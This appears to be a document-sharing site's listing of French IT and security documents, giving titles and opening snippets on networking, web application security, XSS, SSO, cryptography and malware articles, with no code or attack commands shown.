INTERNET est un RESEAU D ORDINATEURS RELIES ENTRE EUX A L ECHELLE PLANETAIRE. Internet : interconnexion de réseaux (anglais : net = réseau) CS WEB Ch 1 Introduction I. INTRODUCTION... 1 A. INTERNET INTERCONNEXION DE RESEAUX... 1 B. LE «WEB» LA TOILE, INTERCONNEXION DE SITES WEB... 2 C. L URL : LOCALISER DES RESSOURCES SUR L INTERNET... 2 D.

Plus en détail

OZSSI NORD 4 JUIN 2015 - LILLE. Conférence thématique: Sécurité des applications

OZSSI NORD 4 JUIN 2015 - LILLE. Conférence thématique: Sécurité des applications OZSSI NORD 4 JUIN 2015 - LILLE Conférence thématique: Sécurité des applications www.advens.fr Document confidentiel - Advens 2015 Présentation de la société Advens 2 La sécurité est source de valeur Pas

Plus en détail

Sécurité des applications Retour d'expérience

Sécurité des applications Retour d'expérience HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Netfocus Sécurité des applications Retour d'expérience Nicolas Collignon

Plus en détail

Adresse directe fichier : Adresse url spécifique sur laquelle le lien hypertext du Client doit être

Adresse directe fichier : Adresse url spécifique sur laquelle le lien hypertext du Client doit être GLOSSAIRE Adresse directe fichier : Adresse url spécifique sur laquelle le lien hypertext du Client doit être redirigé pour permettre l activation du Service. Adresse IP : Numéro qui identifie chaque équipement

Plus en détail

Failles XSS : Principes, Catégories Démonstrations, Contre mesures

Failles XSS : Principes, Catégories Démonstrations, Contre mesures HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Séminaire 15 ans HSC Failles XSS : Principes, Catégories Démonstrations,

Plus en détail

Manuel des logiciels de transferts de fichiers File Delivery Services

Manuel des logiciels de transferts de fichiers File Delivery Services Manuel des logiciels de transferts de fichiers File Delivery Services Editeur La Poste CH SA Technologies de l information Webergutstrasse 12 CH-3030 Berne (Zollikofen) Contact La Poste CH SA Technologies

Plus en détail

SYSTÈME DE GESTION DE FICHIERS

SYSTÈME DE GESTION DE FICHIERS SYSTÈME DE GESTION DE FICHIERS - DISQUE 1 Les couches logiciels réponse requête Requêtes E/S Système E/S Pilote E/S Interruptions utilisateur traitement S.E. commandes S.E. S.E. matériel Contrôleur E/S

Plus en détail

Cours 14. Crypto. 2004, Marc-André Léger

Cours 14. Crypto. 2004, Marc-André Léger Cours 14 Crypto Cryptographie Définition Science du chiffrement Meilleur moyen de protéger une information = la rendre illisible ou incompréhensible Bases Une clé = chaîne de nombres binaires (0 et 1)

Plus en détail

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO)

CIBLE DE SECURITE CSPN DU PRODUIT PASS. (Product for Advanced SSO) CIBLE DE SECURITE CSPN DU PRODUIT PASS (Product for Advanced SSO) Préparé pour : ANSSI Préparé par: Thales Communications & Security S.A. 4 Avenue des Louvresses 92622 GENNEVILLIERS CEDEX France This document

Plus en détail

Table des matières. Avant-propos... Préface... XIII. Remerciements...

Table des matières. Avant-propos... Préface... XIII. Remerciements... Avant-propos... XI Préface... XIII Remerciements... XV Introduction... XVII Pourquoi faire un pentest?... XVII Pourquoi Metasploit?... XVII Un bref historique de Metasploit.... XVIII À propos de ce livre...

Plus en détail

SYSTÈME DE GESTION DE FICHIERS SGF - DISQUE

SYSTÈME DE GESTION DE FICHIERS SGF - DISQUE SYSTÈME DE GESTION DE FICHIERS SGF - DISQUE C.Crochepeyre MPS_SGF 2000-20001 Diapason 1 Les couches logiciels réponse SGF requête matériel matériel Requêtes E/S Système E/S Pilote E/S Interruptions Contrôleur

Plus en détail

Sécurité des réseaux Les attaques

Sécurité des réseaux Les attaques Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques

Plus en détail

Sécurité des Applications Web Comment Minimiser les Risques d Attaques les plus Courants

Sécurité des Applications Web Comment Minimiser les Risques d Attaques les plus Courants GUIDE: Sécurité des Applications Web Comment Minimiser les Risques d Attaques les plus Courants Sommaire I. L essentiel II. Les bases de la sécurité des applications Web III. Types de vulnérabilités inhérentes

Plus en détail

Devenez un véritable développeur web en 3 mois!

Devenez un véritable développeur web en 3 mois! Devenez un véritable développeur web en 3 mois! L objectif de la 3W Academy est de former des petits groupes d élèves au développement de sites web dynamiques ainsi qu à la création d applications web

Plus en détail

La mémoire. Un ordinateur. L'octet. Le bit

La mémoire. Un ordinateur. L'octet. Le bit Introduction à l informatique et à la programmation Un ordinateur Un ordinateur est une machine à calculer composée de : un processeur (ou unité centrale) qui effectue les calculs une mémoire qui conserve

Plus en détail

FileMaker Server 11. Publication Web personnalisée avec XML et XSLT

FileMaker Server 11. Publication Web personnalisée avec XML et XSLT FileMaker Server 11 Publication Web personnalisée avec XML et XSLT 2007-2010 FileMaker, Inc. Tous droits réservés. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, Californie 95054 FileMaker est une

Plus en détail

Sécurité des systèmes informatiques Introduction

Sécurité des systèmes informatiques Introduction Année 2008-2009 Sécurité des systèmes informatiques Introduction Nicolas Baudru mél : nicolas.baudru@esil.univmed.fr page web : nicolas.baudru.esil.perso.univmed.fr 1 Système d'information et système informatique

Plus en détail

Un exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi

Un exemple d'authentification sécurisée utilisant les outils du Web : CAS. P-F. Bonnefoi Un exemple d'authentification sécurisée utilisant les outils du Web : CAS 111 L authentification CAS : «Central Authentication Service» CAS ou le service central d authentification Le système CAS, développé

Plus en détail

Les risques HERVE SCHAUER HSC

Les risques HERVE SCHAUER HSC HERVE SCHAUER HSC Les risques Les risques ne cessent d'augmenter: Informatisation systématique de l'ensemble de la société Ouverture des systèmes d'information sur Internet Démultiplication de ce qui est

Plus en détail

L3 informatique TP n o 2 : Les applications réseau

L3 informatique TP n o 2 : Les applications réseau L3 informatique TP n o 2 : Les applications réseau Sovanna Tan Septembre 2009 1/20 Sovanna Tan L3 informatique TP n o 2 : Les applications réseau Plan 1 Transfert de fichiers 2 Le Courrier électronique

Plus en détail

Linux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch

Linux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch Bernard Boutherin Benoit Delaunay Cahiers de l Admin Linux Sécuriser un réseau 3 e édition Collection dirigée par Nat Makarévitch Groupe Eyrolles, 2003, 2004, 2007, ISBN : 2-212-11960-7, ISBN 13 : 978-2-212-11960-2

Plus en détail

INF4420: Éléments de Sécurité Informatique

INF4420: Éléments de Sécurité Informatique : Éléments de Module II : Sécurité SE et des logiciels José M. Fernandez M-3109 340-4711 poste 5433 Module II Aperçu Semaine 5 Sécurité dans les systèmes d'exploitation (SE) Contrôle d'accès dans les SE

Plus en détail

Revue de code Sécuritéou Test d Intrusion Applicatif. Quel est le plus efficace pour évaluer un niveau de sécurité applicatif?

Revue de code Sécuritéou Test d Intrusion Applicatif. Quel est le plus efficace pour évaluer un niveau de sécurité applicatif? Revue de code Sécuritéou Test d Intrusion Applicatif Quel est le plus efficace pour évaluer un niveau de sécurité applicatif? http://www.google.fr/#q=sebastien gioria Responsable de la branche Audit S.I

Plus en détail

Introduction...3. Objectif...3. Manipulations...3. Gestion des utilisateurs et des groupes...4. Introduction...4. Les fichiers de base...

Introduction...3. Objectif...3. Manipulations...3. Gestion des utilisateurs et des groupes...4. Introduction...4. Les fichiers de base... Système d'exploitation Sommaire Introduction...3 Objectif...3 Manipulations...3 Gestion des utilisateurs et des groupes...4 Introduction...4 Les fichiers de base...4 Quelques commandes d'administration...5

Plus en détail

Le langage C. Séance n 4

Le langage C. Séance n 4 Université Paris-Sud 11 Institut de Formation des Ingénieurs Remise à niveau INFORMATIQUE Année 2007-2008 Travaux pratiques d informatique Le langage C Séance n 4 But : Vous devez maîtriser à la fin de

Plus en détail

Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones.

Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones. PERSPECTIVES Le Single Sign-On mobile vers Microsoft Exchange avec OWA et ActiveSync Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des

Plus en détail

S1-2014. Catalogue des Formations Sécurité. Présentation. Menu. Présentation P.2 Nos formations P.3 Modalités P.9 Bulletin d inscription P.

S1-2014. Catalogue des Formations Sécurité. Présentation. Menu. Présentation P.2 Nos formations P.3 Modalités P.9 Bulletin d inscription P. www.alliacom.com Catalogue des Formations Sécurité S1-2014 Menu P.2 Nos formations P.3 Modalités P.9 Bulletin d inscription P.10 Avec ce nouveau catalogue 2013, Alliacom souhaite partager avec vous vingt

Plus en détail

Guide de l utilisateur Mikogo Version Windows

Guide de l utilisateur Mikogo Version Windows Guide de l utilisateur Mikogo Version Windows Table des matières Création d un compte utilisateur 3 Téléchargement et installation 4 Démarrer une session 4 Joindre une session 5 Fonctionnalités 6 Liste

Plus en détail

Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal

Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal Single Sign-On open source avec CAS (Central Authentication Service) Vincent Mathieu Pascal Aubry Julien Marchal SSO open source avec CAS Introduction Pourquoi le Single Sign-On? Principes du SSO sur le

Plus en détail

Gestion du parc informatique matériel et logiciel de l Ensicaen. Rapport de projet. Spécialité Informatique 2 e année. SAKHI Taoufik SIFAOUI Mohammed

Gestion du parc informatique matériel et logiciel de l Ensicaen. Rapport de projet. Spécialité Informatique 2 e année. SAKHI Taoufik SIFAOUI Mohammed 6, bd maréchal Juin F-14050 Caen cedex 4 Spécialité Informatique 2 e année Rapport de projet Gestion du parc informatique matériel et logiciel de l Ensicaen SAKHI Taoufik SIFAOUI Mohammed Suivi ENSICAEN

Plus en détail

INTRODUCTION A JAVA. Fichier en langage machine Exécutable

INTRODUCTION A JAVA. Fichier en langage machine Exécutable INTRODUCTION A JAVA JAVA est un langage orienté-objet pur. Il ressemble beaucoup à C++ au niveau de la syntaxe. En revanche, ces deux langages sont très différents dans leur structure (organisation du

Plus en détail

UE Programmation Impérative Licence 2ème Année 2014 2015

UE Programmation Impérative Licence 2ème Année 2014 2015 UE Programmation Impérative Licence 2 ème Année 2014 2015 Informations pratiques Équipe Pédagogique Florence Cloppet Neilze Dorta Nicolas Loménie prenom.nom@mi.parisdescartes.fr 2 Programmation Impérative

Plus en détail

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications. www.denyall.com.

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications. www.denyall.com. DenyAll Protect DenyAll Protect Parefeux pour applications et services Web Sécurité & accélération de vos applications Sites institutionnels ou marchands, messageries, outils collaboratifs, portails d

Plus en détail

FOIRE AUX QUESTIONS PAIEMENT PAR INTERNET. Nom de fichier : Monetico_Paiement_Foire_aux_Questions_v1.7 Numéro de version : 1.7 Date : 2014-05-29

FOIRE AUX QUESTIONS PAIEMENT PAR INTERNET. Nom de fichier : Monetico_Paiement_Foire_aux_Questions_v1.7 Numéro de version : 1.7 Date : 2014-05-29 FOIRE AUX QUESTIONS PAIEMENT PAR INTERNET Nom de fichier : Monetico_Paiement_Foire_aux_Questions_v1.7 Numéro de version : 1.7 Date : 2014-05-29 FOIRE AUX QUESTIONS Confidentiel Titre du document : Monetico

Plus en détail

Indicateur et tableau de bord

Indicateur et tableau de bord Agenda Indicateur et tableau de bord «La sécurité n est pas une destination mais un voyage» 1. Jean-François DECHANT & Philippe CONCHONNET jfdechant@exaprobe.com & pconchonnet@exaprobe.com +33 (0) 4 72

Plus en détail

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation Objectif : Tout administrateur système et réseau souhaitant avoir une vision d'ensemble des problèmes de sécurité informatique et des solutions existantes dans l'environnement Linux. Prérequis : Connaissance

Plus en détail

JAB, une backdoor pour réseau Win32 inconnu

JAB, une backdoor pour réseau Win32 inconnu JAB, une backdoor pour réseau Win32 inconnu Nicolas Grégoire Exaprobe ngregoire@exaprobe.com, WWW home page : http ://www.exaprobe.com 1 Introduction Le but de cet article est de montrer les possibilités

Plus en détail

Impression de sécurité?

Impression de sécurité? Impression de sécurité? Matthieu Herrb Capitoul, le 1er avril 2010 Agenda 1 Introduction 2 Risque lié au logiciel d impression 3 Risques liés au réseau 4 Risques liés à l imprimante 5 Risques liés papier

Plus en détail

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de

Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de Supplément de renseignements : Examens d applications et pare-feux d applications web clarifiés Normes : Normes en matière de sécurité des données de la PCI (PCI DSS) Version : 1.2 Date : Octobre 2008

Plus en détail

www.netexplorer.fr contact@netexplorer.fr

www.netexplorer.fr contact@netexplorer.fr www.netexplorer.fr 05 61 61 20 10 contact@netexplorer.fr Sommaire Sécurité applicative... 3 Authentification... 3 Chiffrement... 4 Traçabilité... 4 Audits... 5 Sécurité infrastructure... 6 Datacenters...

Plus en détail

Security Exposed. #1 - Take the red pill. An introduction to hacking & security flaws. ... and follow the white rabbit

Security Exposed. #1 - Take the red pill. An introduction to hacking & security flaws. ... and follow the white rabbit Security Exposed #1 - Take the red pill... and follow the white rabbit An introduction to hacking & security flaws 1 Copyright 2010 Thireus. All Rights Reserved. 1 Sur les traces d un pirate Objectifs

Plus en détail

Les solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC. Qui contacter pour commencer la mise en place d une configuration de test?

Les solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC. Qui contacter pour commencer la mise en place d une configuration de test? Les solutions de paiement CyberMUT (Crédit Mutuel) et P@iement CIC Qui contacter pour commencer la mise en place d une configuration de test? CyberMUT Paiement - Paiement CIC Commerce Electronique mailto:centrecom@e-i.com

Plus en détail

Cisco Certified Network Associate

Cisco Certified Network Associate Cisco Certified Network Associate Version 4 Notions de base sur les réseaux Chapitre 3 01 Quel protocole de la couche application sert couramment à prendre en charge les transferts de fichiers entre un

Plus en détail

Rapport de certification ANSSI-CSPN-2010/05. ModSecurity v2.5.12

Rapport de certification ANSSI-CSPN-2010/05. ModSecurity v2.5.12 PREMIER MINISTRE Secrétariat général de la défense et de la sécurité nationale Agence nationale de la sécurité des systèmes d information Rapport de certification ANSSI-CSPN-2010/05 ModSecurity v2.5.12

Plus en détail

PHISHING/PHARMING. Les Nouvelles Techniques qui portent atteinte à l intégrité des S.I

PHISHING/PHARMING. Les Nouvelles Techniques qui portent atteinte à l intégrité des S.I PHISHING/PHARMING Les Nouvelles Techniques qui portent atteinte à l intégrité des S.I Livre blanc réalisé par le Dr Patrice Guichard Le Phishing Si le «phishing» n est pas à proprement parlé une technique

Plus en détail

Fiche Technique. Cisco Security Agent

Fiche Technique. Cisco Security Agent Fiche Technique Cisco Security Agent Avec le logiciel de sécurité de point d extrémité Cisco Security Agent (CSA), Cisco offre à ses clients la gamme de solutions de protection la plus complète qui soit

Plus en détail

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007

cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 A t t a q u e s c o n t r e l e s a p p l i s w e b cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007 D e l ' u t i l i t é d e l ' a t t a

Plus en détail

(Third-Man Attack) PASCAL BONHEUR PASCAL BONHEUR@YAHOO.FR 4/07/2001. Introduction. 1 Domain Name Server. 2 Commandes DNS. 3 Hacking des serveurs DNS

(Third-Man Attack) PASCAL BONHEUR PASCAL BONHEUR@YAHOO.FR 4/07/2001. Introduction. 1 Domain Name Server. 2 Commandes DNS. 3 Hacking des serveurs DNS Détournement de serveur DNS (Third-Man Attack) PASCAL BONHEUR PASCAL BONHEUR@YAHOO.FR 4/07/2001 Introduction Ce document traite de la possibilité d exploiter le serveur DNS pour pirater certains sites

Plus en détail

les techniques d'extraction, les formulaires et intégration dans un site WEB

les techniques d'extraction, les formulaires et intégration dans un site WEB les techniques d'extraction, les formulaires et intégration dans un site WEB Edyta Bellouni MSHS-T, UMS838 Plan L extraction des données pour un site en ligne Architecture et techniques Les différents

Plus en détail

TD n o 8 - Domain Name System (DNS)

TD n o 8 - Domain Name System (DNS) IUT Montpellier - Architecture (DU) V. Poupet TD n o 8 - Domain Name System (DNS) Dans ce TD nous allons nous intéresser au fonctionnement du Domain Name System (DNS), puis pour illustrer son fonctionnement,

Plus en détail

E-TRANSACTIONS. Guide du programmeur API Plug-in. Version 1.1

E-TRANSACTIONS. Guide du programmeur API Plug-in. Version 1.1 E-TRANSACTIONS Guide du programmeur API Plug-in Version 1.1 Avertissements : Le fichier Version.txt précise l'environnement dans lequel l API a été compilée et testée. L'installation de l API sur tout

Plus en détail

Cours CCNA 1. Exercices

Cours CCNA 1. Exercices Cours CCNA 1 TD3 Exercices Exercice 1 Enumérez les sept étapes du processus consistant à convertir les communications de l utilisateur en données. 1. L utilisateur entre les données via une interface matérielle.

Plus en détail

Rappels réseaux TCP/IP

Rappels réseaux TCP/IP Rappels réseaux TCP/IP Premier Maître Jean Baptiste FAVRE DCSIM / SDE / SIC / Audit SSI jean-baptiste.favre@marine.defense.gouv.fr CFI Juin 2005: Firewall (1) 15 mai 2005 Diapositive N 1 /27 Au menu Modèle

Plus en détail

Standard. Manuel d installation

Standard. Manuel d installation Standard Manuel d installation 1 2 3 4 5 Vérifications avant l installation Installation Création d utilisateurs et Configuration rapide Exemples d utilisation et paramètres Annexe Lisez attentivement

Plus en détail

Live box et Nas Synology

Live box et Nas Synology Live box et Nas Synology Création : OpenOffice.org Version 2.3 Auteur : PHI Création : 18/01/2008: Version : 32 Modification : 24/03/2008 Fichier : E:\Mes documents\tuto NAS LB\tuto ftp.odt Imprimer moi

Plus en détail

Les rootkits navigateurs

Les rootkits navigateurs Sogeti/ESEC Les rootkits navigateurs 1/52 Les rootkits navigateurs Christophe Devaux - christophe.devaux@sogeti.com Julien Lenoir - julien.lenoir@sogeti.com Sogeti ESEC Sogeti/ESEC Les rootkits navigateurs

Plus en détail

Sommaire. 1 Introduction 19. 2 Présentation du logiciel de commerce électronique 23

Sommaire. 1 Introduction 19. 2 Présentation du logiciel de commerce électronique 23 1 Introduction 19 1.1 À qui s adresse cet ouvrage?... 21 1.2 Comment est organisé cet ouvrage?... 22 1.3 À propos de l auteur... 22 1.4 Le site Web... 22 2 Présentation du logiciel de commerce électronique

Plus en détail

Chapitre 1 Windows Server 2008 11

Chapitre 1 Windows Server 2008 11 Chapitre 1 Windows Server 2008 11 1.1. Les fondations du système... 15 1.2. La virtualisation... 16 1.3. La sécurité... 18 1.4. Le Web... 20 1.5. Fonctionnalité disponible dans Windows Server 2008... 21

Plus en détail

webmestre : conception de sites et administration de serveurs web 42 crédits Certificat professionnel CP09

webmestre : conception de sites et administration de serveurs web 42 crédits Certificat professionnel CP09 AISL - Architecture et Intégration des Systèmes Logiciels - 2011-2012 webmestre : conception de sites et administration de serveurs web 42 crédits Certificat professionnel CP09 Administrer un serveur et

Plus en détail

SÉCURISATION DES CONNEXIONS À DISTANCE SUR LES RÉSEAUX DE CONTRÔLE

SÉCURISATION DES CONNEXIONS À DISTANCE SUR LES RÉSEAUX DE CONTRÔLE PUBLICATION CPA-2011-102-R1 - Mai 2011 SÉCURISATION DES CONNEXIONS À DISTANCE SUR LES RÉSEAUX DE CONTRÔLE Par : François Tremblay, chargé de projet au Centre de production automatisée Introduction À l

Plus en détail

Failles des applications Web. Ce document est extrait du travail de diplôme de M. DIZON dans l état.

Failles des applications Web. Ce document est extrait du travail de diplôme de M. DIZON dans l état. Failles des applications Web Ce document est extrait du travail de diplôme de M. DIZON dans l état. 1 Introduction...1 2 Contournement de validation javascript...2 2.1 Introduction...2 2.2 Principe de

Plus en détail

Groupe Eyrolles, 2004, ISBN : 2-212-11274-2

Groupe Eyrolles, 2004, ISBN : 2-212-11274-2 Groupe Eyrolles, 2004, ISBN : 2-212-11274-2 Table des matières Remerciements.................................................. Avant-propos.................................................... Structure

Plus en détail

E.N.T. Espace Numérique de Travail

E.N.T. Espace Numérique de Travail E.N.T. Espace Numérique de Travail Portail de l UM2 Outil de communication, de partage, de stockage, Présentation et Modalités d utilisation Page 1 sur 20 Sommaire I. Présentation du portail 3 A. Le concept

Plus en détail

\ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( <_> ) \ / /\ _ / \ / / \/ \/ \/ Team

\ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( <_> ) \ / /\ _ / \ / / \/ \/ \/ Team \ \ / \ / / \/ ~ \/ _ \\ \ ` \ Y ( ) \ / /\ _ / \ / / \/ \/ \/ Team Tutoriel Hacking La faille XSS ------------------------ By H4X0R666 Ce tutoriel portera sur l exploitation de la faille XSS et sur

Plus en détail

Comment utiliser mon compte alumni?

Comment utiliser mon compte alumni? Ce document dispose d une version PDF sur le site public du CI Comment utiliser mon compte alumni? Elena Fascilla, le 23/06/2010 Sommaire 1. Introduction... 2 2. Avant de commencer... 2 2.1 Connexion...

Plus en détail

Kerberos en environnement ISP UNIX/Win2K/Cisco

Kerberos en environnement ISP UNIX/Win2K/Cisco Kerberos en environnement ISP UNIX/Win2K/Cisco > Nicolas FISCHBACH nico@securite.org - http://www.securite.org/nico/ > Sébastien LACOSTE-SERIS kaneda@securite.org - http://www.securite.org/kaneda/ version

Plus en détail

GUIDE POUR LES NOUVEAUX UTILISATEURS SYSTÈME DE SUIVI DES PRODUITS DE BASE

GUIDE POUR LES NOUVEAUX UTILISATEURS SYSTÈME DE SUIVI DES PRODUITS DE BASE GUIDE POUR LES NOUVEAUX UTILISATEURS SYSTÈME DE SUIVI DES PRODUITS DE BASE Table des matières Introduction... 2 Personnes-ressources... 3 Étapes préalables à l inscription en ligne auprès de l Office national

Plus en détail

«Obad.a» : le malware Android le plus perfectionné à ce jour

«Obad.a» : le malware Android le plus perfectionné à ce jour «Obad.a» : le malware Android le plus perfectionné à ce jour Table des matières I. Le sujet de l article... 2 II. Réflexion sur les nouvelles menaces technologiques d aujourd hui... 2 A. Android, victime

Plus en détail

Charte d hébergement des sites web universitaires "Réseau National Universitaire (RNU)"

Charte d hébergement des sites web universitaires Réseau National Universitaire (RNU) République Tunisienne Ministère de l'enseignement Supérieur, de la Recherche Scientifique et de la Technologie Centre de Calcul El-Khawarizmi Charte d hébergement des sites web universitaires "Réseau National

Plus en détail

Méthode de Test. Pour WIKIROUTE. Rapport concernant les méthodes de tests à mettre en place pour assurer la fiabilité de notre projet annuel.

Méthode de Test. Pour WIKIROUTE. Rapport concernant les méthodes de tests à mettre en place pour assurer la fiabilité de notre projet annuel. Méthode de Test Pour WIKIROUTE Rapport concernant les méthodes de tests à mettre en place pour assurer la fiabilité de notre projet annuel. [Tapez le nom de l'auteur] 10/06/2009 Sommaire I. Introduction...

Plus en détail

PHP 5.4 Développez un site web dynamique et interactif

PHP 5.4 Développez un site web dynamique et interactif Editions ENI PHP 5.4 Développez un site web dynamique et interactif Collection Ressources Informatiques Table des matières Table des matières 1 Chapitre 1 Introduction 1. Objectif de l'ouvrage.............................................

Plus en détail

arcopole Studio Annexe 4 Intégration LDAP et processus d authentification Site du programme arcopole : www.arcopole.fr

arcopole Studio Annexe 4 Intégration LDAP et processus d authentification Site du programme arcopole : www.arcopole.fr arcopole Studio Annexe 4 Intégration LDAP et processus d authentification Site du programme arcopole : www.arcopole.fr Auteur du document : ESRI France Version de la documentation : 1.2.0.0 Date de dernière

Plus en détail

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet

La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet REALSENTRY TM Gestion, Performance et Sécurité des infrastructures Web La Latecion protection anti-intrusion Web Web Le concept «Zero effort Security» La protection des applications Extranet L authentification

Plus en détail

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES et après? 3 avril 2012 www.advens.fr Document confidentiel - Advens 2012 Etat des lieux en 2012 Augmentation de la fréquence et de la complexité des attaques

Plus en détail

Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE

Bee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE Référence : BNX_Cible-de-sécurité_CSPN Version : 1.3 Etat : A valider Date : Affaire/projet : Client : BEE WARE Classification : Diffusion projet Bee Ware i-suite Cible de Sécurité CSPN Validation Fonctionnelle

Plus en détail